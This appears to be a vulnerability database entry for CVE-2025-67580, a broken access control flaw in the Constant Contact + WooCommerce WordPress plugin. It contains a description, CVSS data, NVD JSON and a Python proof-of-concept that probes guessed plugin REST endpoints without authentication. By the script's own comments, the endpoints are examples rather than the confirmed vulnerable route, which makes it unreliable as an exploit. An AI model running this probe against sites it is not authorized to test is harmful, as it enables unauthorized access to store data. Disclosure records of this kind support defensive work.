Security Vulnerability Report
中文
CVE-2025-67580 CVSS 5.3 MEDIUM

CVE-2025-67580

Published: 2025-12-09 16:18:36
Last Modified: 2026-04-27 18:16:44

Description

Missing Authorization vulnerability in Constant Contact Constant Contact + WooCommerce constant-contact-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Constant Contact + WooCommerce: from n/a through <= 2.4.1.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Constant Contact + WooCommerce <= 2.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67580 PoC - Constant Contact + WooCommerce Broken Access Control # Target: WordPress site with Constant Contact + WooCommerce plugin <= 2.4.1 # Note: Replace TARGET_URL with actual vulnerable endpoint identified from plugin import requests import sys TARGET_URL = "http://target-wordpress-site.com" PLUGIN_ENDPOINT = "/wp-json/constant-contact-woocommerce/v1/" # Example endpoint def check_vulnerability(): """ Test for Missing Authorization vulnerability The plugin may expose sensitive endpoints without proper access control """ headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/json' } # Try accessing potentially unprotected endpoints sensitive_endpoints = [ '/settings', '/sync', '/export', '/contacts', '/lists', '/campaigns' ] for endpoint in sensitive_endpoints: url = f"{TARGET_URL}{PLUGIN_ENDPOINT}{endpoint}" try: response = requests.get(url, headers=headers, timeout=10) # Check if response indicates unauthorized access to protected resources if response.status_code == 200 and 'constant_contact' in response.text.lower(): print(f"[!] Potential vulnerability found at: {url}") print(f" Status: {response.status_code}") print(f" Response preview: {response.text[:200]}") return True except requests.RequestException as e: print(f"Error accessing {url}: {e}") print("[*] No obvious vulnerability detected or additional enumeration needed") return False if __name__ == "__main__": print("CVE-2025-67580 PoC - Constant Contact + WooCommerce") print("=" * 60) check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67580", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:35.640", "lastModified": "2026-04-27T18:16:44.327", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Constant Contact Constant Contact + WooCommerce constant-contact-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Constant Contact + WooCommerce: from n/a through <= 2.4.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/constant-contact-woocommerce/vulnerability/wordpress-constant-contact-woocommerce-plugin-2-4-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}